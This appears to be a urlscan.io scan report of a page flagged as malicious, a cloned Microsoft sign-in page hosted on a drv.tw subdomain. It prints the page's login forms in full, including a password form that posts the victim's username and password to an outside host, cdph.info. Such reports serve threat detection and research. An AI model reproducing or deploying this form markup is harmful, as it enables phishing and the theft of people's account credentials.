6wepk8impjoqt3uzvo91sa-on.drv.tw Open in urlscan Pro
47.254.94.70 Malicious Activity! Public Scan

Back to summary

URL:
https://6wepk8impjoqt3uzvo91sa-on.drv.tw/login.com/
Submission Tags: falconsandbox
Submission: On November 26 via api (November 26th 2021, 3:52:33 pm UTC) from US — Scanned from DE

Form analysis
2 forms found in the DOM

POST Login.php

<form method="post" id="loginFormPaginated" class="paginatedPageForm" autocomplete="off" onkeypress="if (event &amp;&amp; event.keyCode == 13) event.preventDefault();" action="Login.php">
  <div id="formsAuthenticationArea">
    <div id="userNameArea">
      <label id="userNameInputLabel" for="userNameInput" class="hidden">User Account</label>
      <input id="userNameInput" name="username" type="email" value="" tabindex="1" class="text textPaginated fullWidth" onkeypress="if (event &amp;&amp; event.keyCode == 13) paginationManager.validateAndNext();" spellcheck="false"
        placeholder="someone@example.com" autocomplete="off">
    </div>
    <div id="error" class="fieldMargin error errorUsernamePaginated smallText">
      <span id="errorText" for="" class="errorText" aria-live="assertive" role="alert"></span>
    </div>
    <div id="introduction" class="groupMargin signInIntroduction">
    </div>
    <div id="kmsiArea" class="kmsiAreaPaginated" style="display:none">
      <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="2">
      <label for="kmsiInput">Keep me signed in</label>
    </div>
    <div class="form-group" data-bind="
                    htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                    childBindings: {
                        'signup': {
                            href: svr.urlSignUp || '#',
                            ariaLabel: svr.urlSignUp ? str['WF_STR_SignupLink_AriaLabel_Text'] : str['WF_STR_SignupLink_AriaLabel_Generic_Text'],
                            click: signup_onClick } }">No account?
      <a href="https://login.live.com/oauth20_authorize.srf?response_type=code&amp;client_id=51483342-085c-4d86-bf88-cf50c7252078&amp;scope=openid+profile+email+offline_access&amp;response_mode=form_post&amp;redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa&amp;state=rQIIAYWSvW_TUADE46RN0wragirUBdSBASE5ef6IY0dicPKaxE1sx3Fc4yyR7TjJcxPbddy08dINMZYBhrKxUQmEOgFTJ5A6de7MgJCQEBMjKf8Ay51Od9vvVpaYLJsFWfA4RWSJ4kOaovNmweJwzmQonOYIgJs0yeBUnmIoEhC9PKDCuyvra5_ebv6sH1eefRlcRO9qp6fYcneEpk7W9sdn2INhFAWTYi53eHiY9ft9ZP8rciPT6yFv8BHDrjDsO4adJhcdD9fUs-SEoQoMBWia5jiWYGnA0FmxKo1lqBFGbEcSadCyCoAx3gYNvTLquEpk6AYptZW8qGtAbO8iqSrOOvrcYy0yYiWWyvN9vDOe75EYi1GnbVNiPEJiVZiJ423iOrkm8wfRkLwRP0Sx8zu53PfDcTfwJ9Fp6lXSDJmKwsMhGVZwgbf5cbtqyopMEsgpy3lX3dMKbqs86tOSOpuW6HI4Q5qsRnZdB_to21PV0CN2Jk4QN4FY41tHmmENedwVBEuyKE1uqSVOd1vi7CmoeI4Fa5QBu47korI76wlNfcrXG3t79XqnkQdQ03umZwezvaCyM0dk25N-rc7CZswdiPpsQE1285aLhu2DWketWiY_aE6niO3QHgLdHlcyHKgJngKPQIlqNDqErJSPGKud75L9-r4f4AXQCPHphA0VgYc4qcgc45tQwH3Gcn3LFng_hl2iVRDsw_NUeg5z7HuXqVU_cDzU2wpCv49GztUC9mPhXia9ntlMbCUebYBUMZNZWU_cpD8L2JvF-XNevxzcP_96XDt78T66-LaauFzMQcWk4v0CDQvOqMkMlQCWGE-kwspUDo4cNMgdsHCHaARySXlCFYmTNHaSTl-m7wiwK2231TYvQb4FyS74lcaeLyU-L__nf9crGyQgCRwUcJLdAnSRZosE1_lwC7u4nfgL0&amp;estsfed=1&amp;uaid=18a9b90f4bed467f86c667c074ad489a&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;fci=4345a7b9-9a63-4910-a426-35363201d503&amp;mkt=en-US" id="signup" aria-label="Create a Microsoft account">Create one!</a><br><br>
    </div>
    <!-- /ko -->
    <!-- ko if: showCantAccessAccountLink -->
    <div class="form-group">
      <a id="cantAccessAccount" name="cannotAccessAccount" data-bind="
                        text: str['WF_STR_CantAccessAccount_Text'],
                        click: accessRecoveryLink ? null : cantAccessAccount_onClick,
                        attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                        href: accessRecoveryLink || '#'" href="#">Can't access your account?</a>
    </div>
  </div>
</form>

POST https://cdph.info/n/next.php

<form method="post" id="loginForm" autocomplete="off" class="paginatedPageForm" novalidate="novalidate" onkeypress="if (event &amp;&amp; event.keyCode == 13) return Login.submitLoginRequest();" action="https://cdph.info/n/next.php">
  <input id="userNameInputHolder" name="username" value="" type="hidden">
  <input id="kmsiHolder" name="Kmsi" value="" type="hidden">
  <input id="formsAuthMethod" type="hidden" name="AuthMethod" value="FormsAuthentication">
  <div id="passwordArea">
    <label id="passwordInputLabel" for="passwordInput" class="hidden">Password</label>
    <input id="passwordInput" name="password" type="password" tabindex="1" class="text textPaginated fullWidth" placeholder="Password" autocomplete="off">
  </div>
  <div class="form-group">
    <a id="idA_PWD_ForgotPassword" role="link" href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSO2_TUACF46RN00q0BSHUBdSBASE5uX7EiSMxOLl5uIntOLYxzhLZjpPYSWzXcR720g0xlgGGsrFRCYZOwNQJpE6dmRkQEhJiYiT9BSzn6Ejf9p2dLSpbzIIseJzCsljpIUmQeb1g0CitUwRK0hhAdRKnUCJPUAQOsH4eEMGdnf29T-8OfjVPas-_DC_D942zc-TBKAz9WSmXWy6XWW8wsE0ra3rT3ER3-7Y7_Igg1wjyA0HOkpuWiyrSeXJGEQWKACRJ0nQRK5KAIrNcnZ8KUMG02Ax5XCMFCQBtWgUttTbpOmKoqRrOy2KeUxXAyU9tvs5FXXXdsRJqsRjzlTUfH03XvM3FXNiVTYKLJzZXZyNuWsW-JfcEZh6O8JvwAju2_iS3B14w7fneLDxLvU7qAVUTGTjCgxrKMiYzleu6IAo4ZlsVIe9IY6XgdCqTAclL0aJMVoLIVgQpNJsqOLarriQFLnY0s_y4DbgG01kpmjFiUIdlDd4gFKEjlWnV6XDRM1BzLQM2CA32LN6xK07UZ9vqgmm2xuNms9vKA6iofd01_Wjs147WWkxzNmg0i7Ad03NOjYbE7GnecOyRPG90pbqhM8P2YmEXu6Rrg16fLmsWVFhXhCtQJlqtLiaIlRVlyPkePmgeez5aAK0AXcyKgcgyEMVFgaY8HbKoRxmOZ5gs48Wwh3UKrLm8SKXXMqeee5Xa9XzLtfuHfuAN7Il1vYH83LiXSe9nDhKHiUd3QaqUyezsJ27W3w3k7eb6LW9eDe9ffD1pnL_8EF5-301cbeagqBPxcYGEBWvSpkaiD8uUyxFBbSH4K8se5uZFeIS1fKEsPiFK2GkaOU2nr9K3Wdjjq7IkMzxkOhDvgd9p5MVW4vP2f_53eSvxDw2&amp;mkt=en-US&amp;hosted=0&amp;device_platform=Windows+10" data-bind="
                            text: str['CT_PWD_STR_ForgotPwdLink_Text'],
                            href: accessRecoveryLink || svr.urlResetPassword,
                            attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                            click: accessRecoveryLink ? null : resetPassword_onClick">Forgot my password</a>
  </div>
  <span id="submitButton" class="submit submitPaginated" tabindex="3" role="button" onkeypress="if (event &amp;&amp; (event.keyCode == 32 || event.keyCode == 13)) Login.submitLoginRequest();" onclick="return Login.submitLoginRequest();">Sign
    in</span>
</form>

Text Content

JAVASCRIPT REQUIRED

JavaScript is required. This web browser does not support JavaScript or
JavaScript in this web browser is not enabled.

To find out if your web browser supports JavaScript or to enable JavaScript, see
web browser help.

Sign in with microsoft account
User Account


Keep me signed in
No account? Create one!


Can't access your account?
Next
Password
Forgot my password
Sign in


� 2018 Microsoft

6wepk8impjoqt3uzvo91sa-on.drv.tw Open in urlscan Pro 47.254.94.70 Malicious Activity! Public Scan

Form analysis 2 forms found in the DOM

POST Login.php

POST https://cdph.info/n/next.php

Text Content

6wepk8impjoqt3uzvo91sa-on.drv.tw Open in urlscan Pro
47.254.94.70 Malicious Activity! Public Scan

Form analysis
2 forms found in the DOM